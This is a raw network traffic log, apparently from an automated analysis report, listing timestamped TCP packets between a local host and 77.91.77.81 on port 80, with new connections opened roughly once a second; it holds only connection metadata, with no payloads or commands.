Jul 2, 2024 00:25:33.276657104 CEST	49760	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:33.277318954 CEST	49760	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:33.282049894 CEST	80	49760	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:33.508966923 CEST	80	49760	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:33.509308100 CEST	49760	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:33.615722895 CEST	49760	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:33.616086960 CEST	49761	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:33.620889902 CEST	80	49761	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:33.620944977 CEST	80	49760	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:33.620965004 CEST	49761	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:33.621023893 CEST	49760	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:33.621260881 CEST	49761	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:33.626018047 CEST	80	49761	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:34.307826996 CEST	80	49761	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:34.307897091 CEST	49761	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:34.316325903 CEST	49761	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:34.321094990 CEST	80	49761	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:34.532372952 CEST	80	49761	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:34.532453060 CEST	49761	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:34.811655998 CEST	49761	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:34.812015057 CEST	49762	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:34.816806078 CEST	80	49762	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:34.816895962 CEST	80	49761	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:34.816909075 CEST	49762	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:34.816940069 CEST	49761	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:34.861696959 CEST	49762	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:34.866584063 CEST	80	49762	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:35.550955057 CEST	80	49762	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:35.551016092 CEST	49762	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:35.551712036 CEST	49762	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:35.558512926 CEST	80	49762	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:35.770709991 CEST	80	49762	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:35.770869017 CEST	49762	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:35.881179094 CEST	49762	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:35.881917953 CEST	49763	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:35.888262987 CEST	80	49762	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:35.888351917 CEST	49762	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:35.888644934 CEST	80	49763	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:35.888746023 CEST	49763	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:35.889019012 CEST	49763	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:35.895263910 CEST	80	49763	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:36.625209093 CEST	80	49763	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:36.625300884 CEST	49763	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:36.626189947 CEST	49763	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:36.634463072 CEST	80	49763	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:36.858711958 CEST	80	49763	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:36.858788013 CEST	49763	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:36.975120068 CEST	49763	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:36.975516081 CEST	49764	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:36.982386112 CEST	80	49763	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:36.982409954 CEST	80	49764	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:36.982532978 CEST	49763	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:36.982537031 CEST	49764	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:36.982732058 CEST	49764	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:36.989984989 CEST	80	49764	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:37.669797897 CEST	80	49764	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:37.669975996 CEST	49764	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:37.671611071 CEST	49764	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:37.676352024 CEST	80	49764	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:37.924441099 CEST	80	49764	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:37.924509048 CEST	49764	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:38.037570000 CEST	49764	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:38.038142920 CEST	49765	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:38.042907000 CEST	80	49764	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:38.043082952 CEST	49764	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:38.043158054 CEST	80	49765	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:38.043303967 CEST	49765	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:38.043467999 CEST	49765	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:38.049088001 CEST	80	49765	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:38.776386023 CEST	80	49765	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:38.776473999 CEST	49765	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:38.777265072 CEST	49765	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:38.782046080 CEST	80	49765	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:39.019613028 CEST	80	49765	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:39.019721985 CEST	49765	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:39.131198883 CEST	49765	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:39.131586075 CEST	49766	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:39.136806011 CEST	80	49766	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:39.136882067 CEST	49766	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:39.137010098 CEST	49766	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:39.137069941 CEST	80	49765	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:39.137126923 CEST	49765	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:39.143418074 CEST	80	49766	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:39.842719078 CEST	80	49766	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:39.842828989 CEST	49766	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:39.851182938 CEST	49766	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:39.856152058 CEST	80	49766	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:40.075289011 CEST	80	49766	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:40.075469017 CEST	49766	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:40.313230038 CEST	49766	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:40.316174030 CEST	49767	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:40.320571899 CEST	80	49766	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:40.320664883 CEST	49766	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:40.323788881 CEST	80	49767	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:40.323885918 CEST	49767	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:40.371304989 CEST	49767	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:40.376126051 CEST	80	49767	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:41.010776997 CEST	80	49767	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:41.010850906 CEST	49767	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:41.015847921 CEST	49767	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:41.020632029 CEST	80	49767	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:41.232532978 CEST	80	49767	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:41.232659101 CEST	49767	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:41.342561007 CEST	49767	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:41.342964888 CEST	49768	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:41.347704887 CEST	80	49767	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:41.347734928 CEST	80	49768	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:41.347780943 CEST	49767	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:41.347831964 CEST	49768	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:41.347975969 CEST	49768	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:41.352716923 CEST	80	49768	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:42.034478903 CEST	80	49768	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:42.034754992 CEST	49768	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:42.035789013 CEST	49768	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:42.040523052 CEST	80	49768	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:42.251048088 CEST	80	49768	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:42.251230001 CEST	49768	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:42.365684986 CEST	49768	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:42.366092920 CEST	49769	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:42.370894909 CEST	80	49768	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:42.370973110 CEST	49768	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:42.371124983 CEST	80	49769	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:42.371202946 CEST	49769	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:42.371419907 CEST	49769	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:42.376120090 CEST	80	49769	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:43.066766977 CEST	80	49769	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:43.066876888 CEST	49769	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:43.067783117 CEST	49769	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:43.074139118 CEST	80	49769	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:43.286154985 CEST	80	49769	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:43.286257029 CEST	49769	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:43.399929047 CEST	49769	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:43.400979996 CEST	49770	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:43.406296015 CEST	80	49769	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:43.406380892 CEST	49769	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:43.407067060 CEST	80	49770	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:43.407155037 CEST	49770	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:43.407735109 CEST	49770	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:43.415023088 CEST	80	49770	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:44.145384073 CEST	80	49770	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:44.145436049 CEST	49770	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:44.182696104 CEST	49770	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:44.189630032 CEST	80	49770	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:44.406802893 CEST	80	49770	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:44.406888962 CEST	49770	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:44.522080898 CEST	49770	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:44.522440910 CEST	49771	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:44.529576063 CEST	80	49771	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:44.529681921 CEST	49771	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:44.530028105 CEST	80	49770	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:44.530086994 CEST	49770	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:44.530352116 CEST	49771	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:44.537431955 CEST	80	49771	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:45.229437113 CEST	80	49771	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:45.229561090 CEST	49771	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:45.230345011 CEST	49771	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:45.237207890 CEST	80	49771	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:45.453689098 CEST	80	49771	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:45.453736067 CEST	49771	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:45.568981886 CEST	49771	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:45.569498062 CEST	49772	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:45.576137066 CEST	80	49772	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:45.576149940 CEST	80	49771	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:45.576278925 CEST	49771	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:45.576471090 CEST	49772	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:45.576471090 CEST	49772	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:45.582828045 CEST	80	49772	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:46.273478031 CEST	80	49772	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:46.273581028 CEST	49772	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:46.274374008 CEST	49772	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:46.281533003 CEST	80	49772	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:46.498425007 CEST	80	49772	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:46.498557091 CEST	49772	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:46.600122929 CEST	49772	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:46.601142883 CEST	49773	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:46.607315063 CEST	80	49772	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:46.607372999 CEST	49772	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:46.608181000 CEST	80	49773	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:46.608256102 CEST	49773	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:46.608462095 CEST	49773	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:46.615504980 CEST	80	49773	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:47.324934006 CEST	80	49773	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:47.325006008 CEST	49773	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:47.326010942 CEST	49773	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:47.334352970 CEST	80	49773	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:47.549350977 CEST	80	49773	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:47.549463987 CEST	49773	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:47.662699938 CEST	49773	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:47.663081884 CEST	49774	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:47.670428991 CEST	80	49773	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:47.670537949 CEST	49773	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:47.670581102 CEST	80	49774	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:47.670655012 CEST	49774	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:47.670804024 CEST	49774	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:47.678369045 CEST	80	49774	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:48.368803978 CEST	80	49774	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:48.368937016 CEST	49774	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:48.369740963 CEST	49774	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:48.374449968 CEST	80	49774	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:48.590985060 CEST	80	49774	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:48.591140985 CEST	49774	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:48.693788052 CEST	49774	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:48.694196939 CEST	49775	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:48.881705999 CEST	80	49775	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:48.881722927 CEST	80	49774	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:48.881803036 CEST	49775	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:48.881834030 CEST	49774	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:48.882122993 CEST	49775	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:48.887289047 CEST	80	49775	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:49.571902990 CEST	80	49775	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:49.571980000 CEST	49775	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:49.574723959 CEST	49775	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:49.581567049 CEST	80	49775	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:49.793989897 CEST	80	49775	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:49.794166088 CEST	49775	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:49.897206068 CEST	49775	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:49.898113012 CEST	49776	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:49.902369022 CEST	80	49775	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:49.902483940 CEST	49775	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:49.903011084 CEST	80	49776	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:49.903095961 CEST	49776	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:49.903357983 CEST	49776	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:49.908200979 CEST	80	49776	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:50.592240095 CEST	80	49776	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:50.592327118 CEST	49776	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:50.593245983 CEST	49776	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:50.598025084 CEST	80	49776	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:50.810106039 CEST	80	49776	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:50.810340881 CEST	49776	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:50.912529945 CEST	49776	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:50.912949085 CEST	49777	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:50.917795897 CEST	80	49777	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:50.917927027 CEST	49777	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:50.918118954 CEST	80	49776	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:50.918145895 CEST	49777	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:50.918174028 CEST	49776	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:50.923039913 CEST	80	49777	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:51.652353048 CEST	80	49777	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:51.652525902 CEST	49777	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:51.653331041 CEST	49777	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:51.658149004 CEST	80	49777	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:51.875099897 CEST	80	49777	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:51.875267029 CEST	49777	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:51.990643978 CEST	49777	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:51.991092920 CEST	49778	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:51.997221947 CEST	80	49778	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:51.997298002 CEST	49778	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:51.997663975 CEST	49778	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:51.997673035 CEST	80	49777	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:51.997730017 CEST	49777	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:52.004292965 CEST	80	49778	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:52.721287966 CEST	80	49778	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:52.721427917 CEST	49778	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:52.722177029 CEST	49778	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:52.726972103 CEST	80	49778	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:52.950196981 CEST	80	49778	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:52.950329065 CEST	49778	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:53.053940058 CEST	49778	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:53.054868937 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:53.059252977 CEST	80	49778	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:53.059395075 CEST	49778	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:53.059818029 CEST	80	49779	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:53.059914112 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:53.060506105 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:53.065690041 CEST	80	49779	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:54.853240013 CEST	80	49779	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:54.853317022 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:54.853403091 CEST	80	49779	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:54.853451014 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:54.853571892 CEST	80	49779	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:54.853614092 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:54.854770899 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:54.860758066 CEST	80	49779	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:55.075937986 CEST	80	49779	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:55.076069117 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:55.178019047 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:55.178427935 CEST	49780	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:55.184711933 CEST	80	49780	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:55.184844017 CEST	49780	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:55.184998035 CEST	49780	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:55.185103893 CEST	80	49779	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:55.185168028 CEST	49779	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:55.191433907 CEST	80	49780	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:55.946350098 CEST	80	49780	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:55.946484089 CEST	49780	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:55.949414968 CEST	49780	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:55.955764055 CEST	80	49780	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:56.170958042 CEST	80	49780	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:56.171098948 CEST	49780	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:56.287525892 CEST	49780	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:56.287914991 CEST	49782	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:56.294358969 CEST	80	49780	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:56.294419050 CEST	80	49782	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:56.294445038 CEST	49780	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:56.294512987 CEST	49782	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:56.294636011 CEST	49782	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:56.301203966 CEST	80	49782	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:57.012132883 CEST	80	49782	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:57.012267113 CEST	49782	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:57.012991905 CEST	49782	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:57.023022890 CEST	80	49782	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:57.245352030 CEST	80	49782	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:57.245404959 CEST	49782	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:57.350025892 CEST	49782	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:57.350449085 CEST	49783	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:57.355294943 CEST	80	49783	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:57.355329037 CEST	80	49782	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:57.355389118 CEST	49783	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:57.355424881 CEST	49782	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:57.355557919 CEST	49783	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:57.360340118 CEST	80	49783	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:58.063947916 CEST	80	49783	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:58.064114094 CEST	49783	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:58.065080881 CEST	49783	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:58.069983959 CEST	80	49783	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:58.288095951 CEST	80	49783	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:58.290626049 CEST	49783	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:58.397092104 CEST	49783	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:58.397407055 CEST	49784	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:58.403532982 CEST	80	49783	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:58.403808117 CEST	80	49784	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:58.403872013 CEST	49783	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:58.403911114 CEST	49784	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:58.404119968 CEST	49784	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:58.411909103 CEST	80	49784	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:59.105945110 CEST	80	49784	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:59.106040001 CEST	49784	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:59.106956959 CEST	49784	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:59.113945961 CEST	80	49784	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:59.330193043 CEST	80	49784	77.91.77.81	192.168.2.4
Jul 2, 2024 00:25:59.330378056 CEST	49784	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:59.443720102 CEST	49784	80	192.168.2.4	77.91.77.81
Jul 2, 2024 00:25:59.444092989 CEST	49785	80	192.168.2.4	77.91.77.81
